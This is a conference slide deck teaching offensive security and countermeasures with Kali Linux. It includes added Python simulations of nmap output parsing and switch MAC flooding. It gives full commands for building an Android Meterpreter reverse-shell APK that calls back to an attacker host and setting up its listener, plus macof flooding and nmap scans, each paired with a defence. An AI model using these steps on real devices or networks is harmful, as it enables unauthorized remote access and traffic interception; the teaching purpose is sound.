Offensive Security 
and Countermeasures 
using Kali Linux
Tony Bemus
Ohio Linux Fest 10/8/2016 
The information in this 
presentation is intended for
 educational use only. 
(Don't be evil) 
Techniques shown should only be
performed on your own network. 
Using these skills on a network without
prior consent is illegal.

Offensive Security (Pen Testing):
"a proactive and adversarial approach to
protecting computer systems, networks
and individuals from attacks."

Countermeasure (Security Control):
"The deployment of a set of security services to
protect against a security threat."
Cyber Security Considerations (the CIA triad)
  • Confidentiality - keeping information hidden from unauthorized
    people, using encryption, two-factor auth, and safeguarding
    keys and backups.
  • Integrity - maintaining and assuring the accuracy and
    completeness of data over its entire life-cycle.
  • Availability - the information must be available when it
    is needed.
Basic Security Countermeasures
  • Install Antivirus / Anti-malware (Windows)
  • Use a Password Manager (LastPass / KeePassX)
  • Use Strong and Unique Passwords
  • Install Security Patches and Updates
  • Automated Backups
  • Enable the Firewall
  • Don't Over Share on Social Media
  • Enable Drive Encryption

Kali Linux - Advanced Penetration Testing Distribution
Funded and Maintained by Offensive Security
  • Debian based - Gnome 3
  • More than 600 Pen Testing Tools
  • ARMEL and ARMHF support
  • Previously known as BackTrack Linux
Kali Linux Metapackages (install with: apt-get install <name>):
kali-linux-all      : All Available Packages in Kali Linux
kali-linux-sdr      : Software Defined Radio (SDR) Tools in Kali
kali-linux-gpu      : Kali Linux GPU-Powered Tools
kali-linux-wireless : Wireless Tools in Kali
kali-linux-web      : Kali Linux WebApp Assessment Tools
kali-linux-forensic : Kali Linux Forensic Tools
kali-linux-voip     : Kali Linux VoIP Tools
kali-linux-pwtools  : Kali Linux Password Cracking Tools
kali-linux-top10    : Top 10 Kali Linux Tools
kali-linux-rfid     : Kali Linux RFID Tools

Kali Linux Top 10 tools (the kali-linux-top10 metapackage)
  • aircrack-ng - cracking WiFi (WEP / WPA-PSK) passwords
  • burpsuite - intercepting proxy for web application testing
  • hydra - online password brute forcing against network logins
  • john - offline password hash cracking (brute force / wordlist)
  • maltego - research and recon (OSINT)
  • metasploit - exploit framework
  • nmap - network scanner
  • zaproxy - finding vulnerabilities in web applications
  • sqlmap - detecting and exploiting SQL injection flaws
  • wireshark - network packet capture and analysis
Android RAT with MSF
(Remote Access Trojan)    (Metasploit Framework)
Create an installable program: an APK carrying a reverse-TCP Meterpreter
payload that calls back to the attacker's IP (LHOST) on port 4444 (LPORT)
     # msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=4444 R > OLF2016.apk
Send the file to the phone (social engineering needed - email or post on a website)
Start msfconsole to accept the connection
     # msfconsole
Select the generic handler
     msf > search multi/handler
     msf > use exploit/multi/handler
Configure the payload (it must match the one built into the APK)
     msf > set PAYLOAD android/meterpreter/reverse_tcp
Set options (msfconsole syntax is "set NAME VALUE", with no "=")
     msf > show options
     msf > set LHOST IP
     msf > set LPORT 4444
To verify settings:
     msf > show options
Launch the handler and wait for the phone to connect
     msf > exploit

Countermeasure - Install security patches
                 Be vigilant about what is installed: keep "Unknown sources"
                 disabled so a sideloaded APK like this one cannot be installed
Scan computers using nmap
Ping sweep of the subnet (on the local LAN nmap discovers hosts with ARP
requests, which a host firewall cannot block; -sP is the older spelling of -sn)
     # nmap -sP -v -n IP_Range/24 > OLF-Scan1.txt

UDP scan of a specific computer. An ICMP type 3, code 3 (port unreachable)
response means the port is closed; no response at all is reported as
open|filtered. The downside is that a firewall which drops the ICMP error
makes closed ports look open (false positives), so open|filtered UDP
results need a follow-up check (for example version probing with -sV).
     # nmap -sU -v -n IP_address > OLF-Scan2.txt

OS Fingerprinting
     # nmap -O -v -n IP_address > OLF-Scan3.txt
Combine a TCP SYN scan and a UDP scan with OS fingerprinting and
version detection (-A)
     # nmap -A -sS -sU -v -n IP_address > OLF-Scan4.txt

Countermeasure - Enable a stateful firewall
                 Block ICMP packets (hides hosts from ping sweeps coming
                 from other subnets and turns UDP results into
                 open|filtered; ARP discovery on the local segment
                 still works)
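The scan commands above redirect nmap's normal text output into OLF-Scan*.txt files. The following is an added example (not code from the slides, from nmap or from the presenter) that reads such a file back into structured data and applies the UDP port-state rule just described: ICMP 3/3 means closed, a UDP reply means open, nothing means open|filtered. SAMPLE_REPORT is a constructed report; the hosts, addresses and OS guess in it are made up, and simulate_udp_scan() is a hypothetical host used only to show the firewall false-positive effect.

```python
"""Reading the nmap reports saved above and interpreting UDP port states.

Added example for these slides; not code from nmap or from the presenter.
SAMPLE_REPORT is a constructed report in nmap's normal text format (what
'> OLF-Scan2.txt' captures). Hosts, addresses and the OS guess are made up.
"""
import re
from collections import Counter

HOST_RE = re.compile(r"^Nmap scan report for (\S+)(?: \((\d+\.\d+\.\d+\.\d+)\))?")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(open\|filtered|open|closed|filtered)\s+(\S+)")
OS_RE = re.compile(r"^(?:OS details|Aggressive OS guesses): (.+)$")

SAMPLE_REPORT = """\
Starting Nmap 7.12 ( https://nmap.org ) at 2016-10-08 10:00 EDT
Nmap scan report for 192.168.56.101
Host is up (0.00042s latency).
Not shown: 997 closed ports
PORT    STATE         SERVICE
22/tcp  open          ssh
80/tcp  open          http
53/udp  open|filtered domain
123/udp open|filtered ntp
161/udp closed        snmp
MAC Address: 08:00:27:AB:CD:EF (Oracle VirtualBox virtual NIC)
Aggressive OS guesses: Linux 3.2 - 4.4 (98%)
Nmap scan report for olf-printer.lan (192.168.56.120)
Host is up (0.0010s latency).
PORT     STATE SERVICE
9100/tcp open  jetdirect
Nmap done: 2 IP addresses (2 hosts up) scanned in 20.11 seconds
"""


def parse_nmap_report(text):
    """Turn normal nmap output into a list of {host, ip, ports, os} dicts."""
    hosts, cur = [], None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            cur = {"host": m.group(1), "ip": m.group(2) or m.group(1), "ports": [], "os": None}
            hosts.append(cur)
            continue
        if cur is None:
            continue
        m = PORT_RE.match(line)
        if m:
            cur["ports"].append({"port": int(m.group(1)), "proto": m.group(2),
                                 "state": m.group(3), "service": m.group(4)})
            continue
        m = OS_RE.match(line)
        if m:
            cur["os"] = m.group(1)
    return hosts


def udp_state_summary(hosts):
    """Count UDP states across all hosts. 'open|filtered' is the ambiguous
    case from the slide: no reply, so either open or a firewall dropped
    the ICMP error."""
    counts = Counter(p["state"] for h in hosts for p in h["ports"] if p["proto"] == "udp")
    return dict(counts)


def classify_udp_probe(reply):
    """nmap's rule for one UDP probe. reply is None (nothing came back),
    ("udp", payload) or ("icmp", type, code)."""
    if reply is None:
        return "open|filtered"          # open, or the ICMP error was filtered
    if reply[0] == "udp":
        return "open"                   # the service answered
    icmp_type, code = reply[1], reply[2]
    if icmp_type == 3 and code == 3:
        return "closed"                 # port unreachable
    if icmp_type == 3 and code in (1, 2, 9, 10, 13):
        return "filtered"               # host/net/admin-prohibited unreachables
    return "open|filtered"


def simulate_udp_scan(closed_ports, firewall_drops_icmp, ports=range(1, 6)):
    """The false-positive effect on a hypothetical host: closed ports answer
    with ICMP 3/3 unless a firewall drops that error, in which case they
    look exactly like open ones."""
    result = {}
    for port in ports:
        if port in closed_ports and not firewall_drops_icmp:
            reply = ("icmp", 3, 3)
        else:
            reply = None                # most open UDP services ignore an empty probe
        result[port] = classify_udp_probe(reply)
    return result


if __name__ == "__main__":
    for h in parse_nmap_report(SAMPLE_REPORT):
        print(h["ip"], h["os"], [(p["port"], p["proto"], p["state"]) for p in h["ports"]])
    print(simulate_udp_scan({2, 4}, firewall_drops_icmp=True))
```

Running the simulation with firewall_drops_icmp=True returns open|filtered for every port, including the ones that are actually closed, which is exactly the false positive the slide warns about.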
Network Sniffing with macof and Wireshark
Network switches forward frames only to the port
where the intended MAC address is located, using a
MAC address (CAM) table learned from source addresses.
When that table is full the switch fails open: it can no
longer learn new addresses and floods frames out every
port, behaving like a hub.
macof (from the dsniff package) floods the switch with
frames carrying random source MAC addresses until the
table fills up:
     # macof -i interface
Once the switch fails open, the attacker can sniff all
traffic on the segment with Wireshark (promiscuous mode).
Countermeasure - use port security, which limits the number
of MAC addresses learned on an access port and shuts the
port down on a violation (Cisco IOS, interface config mode)
     Switch(config-if)# switchport mode access
     Switch(config-if)# switchport port-security
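To make the fail-open behaviour and the port-security countermeasure concrete, here is an added example (not code from the slides, from macof, or from any switch vendor): a small simulated learning switch. The model is an assumption for illustration, with a tiny CAM capacity, no aging timer, and a port-security mode that mimics Cisco's default "violation shutdown" (the port is err-disabled on the first address over the limit). The scenario floods the table from the attacker's port first, which on a real switch is the state reached once the legitimate hosts' entries age out while macof keeps running.

```python
"""CAM-table overflow (what macof does) and port security, simulated.

Added example, not code from the slides, from macof or from any switch
vendor. The switch model is deliberately small: one learning table with
CAM_CAPACITY entries, no aging timer, and a port-security mode that mimics
Cisco's default "violation shutdown". Real tables hold thousands of
entries; macof fills them in seconds.
"""
import random

BROADCAST = "ff:ff:ff:ff:ff:ff"
CAM_CAPACITY = 64          # toy capacity, small so the overflow is quick to see


class Switch:
    def __init__(self, ports, capacity=CAM_CAPACITY, port_security_max=None):
        self.ports = list(ports)
        self.capacity = capacity
        self.cam = {}                            # learned MAC -> port
        self.max_per_port = port_security_max    # None = port security off
        self.err_disabled = set()                # ports shut down by a violation

    def _macs_on(self, port):
        return sum(1 for p in self.cam.values() if p == port)

    def forward(self, src, dst, in_port):
        """Process one frame; return the list of egress ports."""
        if in_port in self.err_disabled:
            return []
        if src not in self.cam:                  # learning phase
            if self.max_per_port is not None and self._macs_on(in_port) >= self.max_per_port:
                self.err_disabled.add(in_port)   # port-security violation: shut the port
                return []
            if len(self.cam) < self.capacity:
                self.cam[src] = in_port
            # table full: the address is silently not learned
        out = self.cam.get(dst)                  # forwarding phase
        if dst == BROADCAST or out is None:
            # unknown destination: flood out every other live port (hub behaviour)
            return [p for p in self.ports if p != in_port and p not in self.err_disabled]
        return [] if out == in_port else [out]


def run_macof(switch, attacker_port, frames, seed=1):
    """macof behaviour: frames with random source and destination MACs."""
    rng = random.Random(seed)                    # seeded so runs are repeatable
    for _ in range(frames):
        src = ":".join("%02x" % rng.randrange(256) for _ in range(6))
        dst = ":".join("%02x" % rng.randrange(256) for _ in range(6))
        switch.forward(src, dst, attacker_port)


def attack_outcome(port_security_max=None, attacker_frames=500):
    """Victim A on port 1, server B on port 2, attacker on port 3.

    The attacker floods first, then B and A talk. Returns whether the
    A->B frame is copied to the attacker's port, how full the table is,
    and whether port security shut the attacker's port down.
    """
    sw = Switch(ports=[1, 2, 3], port_security_max=port_security_max)
    run_macof(sw, attacker_port=3, frames=attacker_frames)
    a, b = "00:11:22:33:44:01", "00:11:22:33:44:02"
    sw.forward(b, a, 2)                          # B is learned only if there is room
    egress = sw.forward(a, b, 1)
    return {
        "sniffable": 3 in egress,
        "cam_entries": len(sw.cam),
        "attacker_port_disabled": 3 in sw.err_disabled,
    }


if __name__ == "__main__":
    print("no port security   :", attack_outcome())
    print("port-security max 1:", attack_outcome(port_security_max=1))
```

Without port security the 500 flooded addresses fill the table, B cannot be learned, and the A to B frame is flooded to the attacker's port. With a limit of one address per port the attacker's second frame trips the violation, the port is shut down, and A's traffic reaches only B.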

Contact me at:

Tony Bemus on Google+

@tbemus on twitter 
Advanced Penetration Testing Services - Offensive Security. (n.d.). Retrieved March 4, 2016,
Catalyst 4500 Series Switch Cisco IOS Software Configuration Guide, 12.2(25)EW -
    Configuring Port Security [Cisco Catalyst 4500 Series Switches] - Cisco. (n.d.). Retrieved March 8, 2016,
CISSP Domains | Information Security Certification from (ISC)². (n.d.). Retrieved March 4, 2016,
Countermeasure (computer) - Wikipedia, the free encyclopedia. (n.d.-b). Retrieved March 7, 2016,
Guiding Principles in Information Security - InfoSec Resources. (n.d.). Retrieved March 4, 2016,
Information security - Wikipedia, the free encyclopedia. (n.d.). Retrieved March 4, 2016,
Kali Linux | Penetration Testing And Ethical Hacking Linux Distribution. (n.d.). Retrieved March 4, 2016,
Kali Metapackages | Penetration Testing Tools. (n.d.). Retrieved March 4, 2016,
NetSecNow. (n.d.). Kali Linux - Android Phone Hack. Retrieved
Use SQLMAP SQL Injection to hack a website and database in Kali Linux - darkMORE Ops. (n.d.). Retrieved March 8, 2016,
What is offensive security ? - Definition from (n.d.). Retrieved March 7, 2016,
Zaproxy | Penetration Testing Tools. (n.d.). Retrieved March 8, 2016,